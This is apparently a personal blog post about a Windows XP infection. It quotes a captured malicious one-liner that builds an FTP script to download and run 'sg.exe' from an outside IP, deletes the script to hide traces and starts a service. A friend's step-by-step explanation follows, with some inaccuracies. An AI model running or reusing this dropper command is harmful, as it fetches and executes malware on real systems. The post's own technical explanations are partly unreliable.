We have a desktop (with Windows XP installed) which my mother uses for her daily work. Needless to say, she doesn’t know much beyond checking email. So, whenever she has a problem or the comp messes up, I have to do the dirty work.
Recently, my mom thought that the comp had suddenly slowed up and asked me to take a look. The comp was definitely infiltrated. Not only was it unusually slow, no new temporary file could be created. This is pretty serious, because common things like creating a zip file and burning CDs won’t work. First thing I did was run chkdsk. I found that one of the files inside TEMP was cross-linked to allocation block 20, at which point the chkdsk would hang.
I was randomly messing with the command line, in hope that something would work, when this script suddenly popped up.
59.95.209.158 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit
Interesting!
I don’t think the user is supposed to see this, but something I did (wish I knew!) made this show up. Now, this was definitely an intrusion of some sort. I don’t know much about this stuff, so I fired this off to my good friend Jitesh Shah.Here is his reply (verbatim):
this script is connecting to a server and downloading sg.exe
and the ftp options mean the foll :
-n = suppress auto-login
-v = suppress display of server responses
-s:filename = specify an ftp file. commands in this file are executed serially.. as in a shell scripteach command in a shell script is prefixed by “&”…
eg. &dir , &cls … etc“net start” starts all the services…
here’s a little summary i managed :
(with a little change in ur copy pasted log… it should have been prefixed by the command “open”, as far as i know…
here’s what happens :
open 59.95.209.158 43642 >> ij
“ij” is a normal file. Output redirection is used.
i.e. “open 59.95.209.158 43642” is written to a file “ij”&echo user t g >> ij
next line in file is “user t g”.. i.e. login to your computer using username “t” and password “g” (which means.. that there a backdoor already installed).&echo get sg.exe >> ij
get the file “sg.exe” from the server. (probably a virus)&echo bye >> ij
“bye” command quits ftp&ftp -n -v -s:ij
execute ftp command in shell… and input file is ij … which now looks something like thisij contents :
open 59.95.209.158 43642
user t g
get sg.exe
bye&del ij
remove the file “ij”…. cover the traces&sg.exe
execute the downloaded virus file in shell&net start SharedAccess
start all services.. which are, by now, infected&exit
quit shell.. work done !!
comp infected !!
Kewl!
So now, I’m going to Google this stuff a bit, and see if I can get the hang of this stuff. I’ll also be seeing if I can do some reverse engineering on sg.exe. What exactly does this exe do anyway? Is it a service in windows? I also wanna check if this script left some logs, and if I can get the attack IP. Nice! *Rubbing hands in delight!*
UPDATE:
Surprise!
couldn’t find any sg.exe on the desktop. maybe I interrupted the script? Dunno… here’s a screenshot though, check out the temp folder!
Tech Rants 